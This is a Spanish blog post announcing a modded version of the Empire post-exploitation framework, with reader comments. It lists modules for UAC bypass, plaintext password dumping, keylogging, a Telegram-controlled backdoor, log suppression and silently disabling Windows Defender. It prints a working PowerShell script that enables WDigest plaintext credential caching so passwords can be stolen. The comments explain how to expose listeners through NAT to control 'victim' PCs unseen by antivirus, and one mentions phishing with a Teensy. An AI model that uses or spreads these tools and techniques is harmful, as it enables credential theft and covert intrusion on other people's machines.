Mod de Empire con nuevos módulos

Seguro que ya conocéis Empire, un agente de post-explotación escrito en PowerShell y Python con una arquitectura muy flexible que trae varios módulos que van desde keyloggers hasta Mimikatz. Puede ejecutarse incluso sin powershell.exe y es capaz de cifrar sus comunicaciones y evadir NIDS, todo ello con un framework bastante fácil de usar.

Luis Vacas (aka Cybervaca) lleva tiempo trabajando en un mod de Empire para Hackplayers al que ha añadido nuevos e interesantes módulos:
  • BypassUAC-HackPlayers-eventvwr.ps1   (BypassUAC using eventvwr working in Windows 7/8/10)
  • Invoke-Mimikittenz  (Using Windows function ReadProcessMemory() in order to extract plain-text passwords)
  • Invoke-Mimigatoz   (Variant of Mimikatz)
  • Keylogger_selective   (Executes a keylogger selectively)
  • PsBoTelegram   (Backdoor controlled from telegram)
  • Execute-Url-Script   (Run scripts from a file in a url)
  • Sherlock   (Find privilege escalation vulnerabilities)
  • MS16-135   (Exploit privilege escalation MS16-135 x64 by b33f FuzzySecurity)
  • Invoke-HostRecon   (Situational Awareness)
  • Binder-4System   (Get System from service process)
  • Invoke-Phant0m   (Stops threads from the svhost process to prevent it from logging events without stopping the service.)
  • Set-WindowsDefender   (We can disabled and enabled Windows Defender silently)
Además ha preparado un vídeo tutorial introductorio en el que muestra como instalar el mod desde el repositorio y utilizar alguno de sus módulos, para que veáis lo fácil y a la vez potente que resulta utilizarlos. ¡No os lo perdáis!:

Nota: cortesía de Luis, os paso el script para añadir el regkey que hay que crear para que funcione mimikitenz en Windows 10
param(
[string]$Activar="si"

)

$ErrorActionPreference = "SilentlyContinue"
if ($Activar -like "si" -or $args -like "Si") {$Activar="Si"} else {$Activar="No"} 

######################################################################################################################

$ruta_key = "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"
$key = "UseLogonCredential"
$check_exist_key = Test-Path $ruta_key
if ($check_exist_key -eq $null) {$check_exist_key = "False"}
$check_valor_key = Get-ItemProperty $ruta_key | Select-Object $key ; $check_valor_key = $check_valor_key.UseLogonCredential

######################################################################################################################


if ($Activar -eq "Si") { New-ItemProperty -Path $ruta_key -Name $key -Value "1" -PropertyType DWORD -Force| Out-Null; Write-Host "nnAñadida clave de registro, es necesario reiniciar." } 
if ($Activar -eq "No") {Remove-ItemProperty $ruta_key -Name $key  -Force | Out-Null ; "nnEliminada clave de registro, es necesario reiniciar."}

Proyecto GitHub: https://github.com/Hackplayers/Empire-mod-Hackplayers

11 comentarios :

  1. Muy buena Herramienta solo que tengo una una duda al momento de utilizar mi ip publica me envia un mensaje diciendo que no puedo abrir puertos en esa direccion y solo funciona si especifico la ip local.. estoy en mi trabajo y mientras "trabajo" he estado viendo un poco el codigo para ver si puedo hacerlo funcionar en NAT..

    ResponderEliminar
    Respuestas
    1. Hola Josué, para hacerlo desde la WAN, tenemos 2 opciones.

      La primera opción es la fácil y sería poner de listener un dyndns o un dominio que apunte a tu IP pública.

      La segunda opción quizá para algunos más compleja, sería :

      Crear es listener con nuestra IP privada. En usestage elegiríamos Launcher y sin codificar en Base64. Sustituir en el Code la IP pública por la privada. Y en el router redireccionar el puerto del Listener a nuestra IP local. Luego el Code ya si quieres lo codificas a base64. Espero haber resuelto tu duda. Un saludo.

      Eliminar
    2. Para configurar un listener con la IP pública tenemos que configurar 2 listeners distintos.
      1º - Un listener del tipo "native" apuntando a la dirección privada de Empire.
      2º - Un listener de tipo "foreign" apuntando a la IP pública al puerto del primer listener privado que levantamos antes.
      Hecho ésto puedes pedirle a Empire que te lance el launcher del 2º listener y debería funcionar si está todo bien nateado.

      Eliminar
    3. No me digas que eso es así, jajaja entonces yo le daba mas vueltas de las que debía el caso es que me ha funcionado así desde la WAN sin problemas. Por casualidad has probado el HOP?

      Eliminar
    4. probe con un Hostname y definitivamente funciona a la perfeccion.

      me causa mucho interes el hecho de que solo necesito ejecutar un comando sencillo en la consola de comando para poder disponer de la PC victima y luego hacer infinidad de cosas en ella como obtener muy facilmente System. tomo tu palabra al decir que Empire la major herramienta de post que hay para Windows y muy buen trabajo con el Mod Hackplayers.. soy un fiel lector del blog :3 sigan asi!

      Eliminar
    5. Además de que sea con sólo un comando también te permite corretear y hacerle cositas al Windows sin que los antivirus se enteren de nada.
      El hop.php no lo usé todavía. Empecé a usar Empire para llenar el buffer del CVE-2017-0199 y, al gustarme, me preparé un Teensy para pescar equipos descuidados. Con esas 2 plataformas se llega lejísimos.
      Y también soy un fiel lector del blog. Algún día quizá escriba algo que valga la pena publicar aquí. Mientras tanto, sigamos leyendo y jugando...

      Eliminar
    6. Nos alegra que os guste. Josué aunque por hostname funciona, si lo quieres hacer por IP, la forma más sencilla es como comenta Anónimo. Y es seleccionar el tipo de listener "foreign" y de ahí sacar el launcher. Si encontráis scripts interesantes para implementar, enviar algún mail a hackplayers o meteros en el grupo de Telegram.

      Un saludo.

      Eliminar
  2. Saludos,

    Tengo una Consulta, si una computadora en este caso victima en su Get-ExecutionPolicy en PS esta definida como Restricted el Empire sigue funcionando?

    ResponderEliminar
    Respuestas
    1. Sí, funciona perfectamente en entornos con ExecutionPolicy en Restricted.
      A mi parecer Empire es, ahora mismo, la major herramienta de post que hay para Windows.

      Eliminar
  3. He acabado de instalar Hack Empire y Leviathan Framework en Ubuntu 16.04, ahora si a trabajar... gracias por los aportes de ésta gran comunidad al mundo.

    ResponderEliminar